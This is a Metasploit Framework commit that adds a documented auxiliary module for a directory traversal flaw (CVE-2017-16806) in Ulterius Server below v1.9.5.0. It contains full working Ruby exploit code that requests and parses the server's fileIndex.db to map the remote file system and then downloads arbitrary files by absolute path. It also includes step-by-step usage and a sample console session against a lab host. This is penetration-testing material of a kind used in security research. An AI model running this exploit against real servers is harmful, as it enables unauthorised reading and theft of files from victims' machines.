Land rapid7#9509, Ulterius Server < v1.9.5.0 Directory Traversal

wchen-r7 · wchen-r7 · commit b533ec60190d · 2018-02-15T16:34:31.000-06:00
Land rapid7#9509
diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
@@ -0,0 +1,64 @@
+## Description
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's `HttpServer.Process` function call. While processing file requests, the `HttpServer.Process` function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Vulnerable Application
+
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called `fileIndex.db`, which contains filenames and directories located on the server. By requesting `fileIndex.db` and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing `fileIndex.db`, additional requests can be generated to download desired files.
+
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the `fileIndex.db` is usually located at:
+
+`http://ulteriusURL:22006/.../fileIndex.db`
+
+Note: 22006 was the default port after setting up the Ulterius Server.
+
+After retrieving absolute paths for files, the files can be retrieved by sending requests of the form:
+
+`http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
+
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the `HttpServer.Process` function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+
+> If *path2* includes a root, *path2* is returned. 
+
+## Options
+
+**PATH**
+
+This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
+
+Note: If you are using relative paths, use three periods when traversing down a level in the directory structure. If absolute paths are used, make sure to include the drive letter.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Scenarios
+
+### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64.
+
+```
+msf5 > use auxiliary/admin/http/ulterius_file_download
+msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
+rhost => 172.22.222.122
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Starting to parse fileIndex.db...
+[*] Remote file paths saved in: filepath0
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] C:/users/pwnduser/desktop/tmp.txt
+[*] File contents saved: filepath1
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) >
+```
diff --git a/modules/auxiliary/admin/http/ulterius_file_download.rb b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ulterius Server File Download Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0
+        to download files from the affected host. A valid file path is needed to download a file.
+        Fortunately, Ulterius indexes every file on the system, which can be stored in the
+        following location:
+
+          http://ulteriusURL:port/.../fileIndex.db.
+
+        This module can download and parse the fileIndex.db file. There is also an option to
+        download a file using a provided path.
+      },
+      'Author'         =>
+        [
+          'Rick Osgood',   # Vulnerability discovery and PoC
+          'Jacob Robles'   # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '43141' ],
+          [ 'CVE', '2017-16806' ]
+        ]))
+
+      register_options(
+        [
+          Opt::RPORT(22006),
+          OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),
+        ])
+  end
+
+  def process_data(index, parse_data)
+    length = parse_data[index].unpack('C')[0]
+    length += parse_data[index+1].unpack('C')[0]
+    length += parse_data[index+2].unpack('C')[0]
+    length += parse_data[index+3].unpack('C')[0]
+
+    index += 4
+    filename = parse_data[index...index+length]
+    index += length
+    return index, filename
+  end
+
+  def inflate_parse(data)
+    zi = Zlib::Inflate.new(window_bits =-15)
+    data_inflated = zi.inflate(data)
+
+    parse_data = data_inflated[8...-1]
+    remote_files = ""
+
+    index = 0
+    print_status('Starting to parse fileIndex.db...')
+    while index < parse_data.length
+      index, filename = process_data(index, parse_data)
+      index, directory = process_data(index, parse_data)
+      remote_files << directory + '\\' + filename + "\n"
+
+      #skip FFFFFFFFFFFFFFFF
+      index += 8
+    end
+    myloot = store_loot('ulterius.fileIndex.db', 'text/plain', datastore['RHOST'], remote_files, 'fileIndex.db', 'Remote file system')
+    print_status("Remote file paths saved in: #{myloot.to_s}")
+  end
+
+  def run
+    path = datastore['PATH']
+    # Always make sure there is a starting slash so as an user,
+    # we don't need to worry about it.
+    path = "/#{path}" if path && path[0] != '/'
+
+    print_status("Requesting: #{path}")
+
+    begin
+      res = send_request_cgi({
+        'uri' => normalize_uri(path),
+        'method' => 'GET'
+      })
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable, Errno::ECONNRESET => e
+      vprint_error("Failed: #{e.class} - #{e.message}")
+      return
+    end
+
+    if res && res.code == 200
+      if path =~ /fileIndex\.db/i
+        inflate_parse(res.body)
+      else
+        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')
+        print_status("File contents saved: #{myloot.to_s}")
+      end
+    end
+  end
+
+end
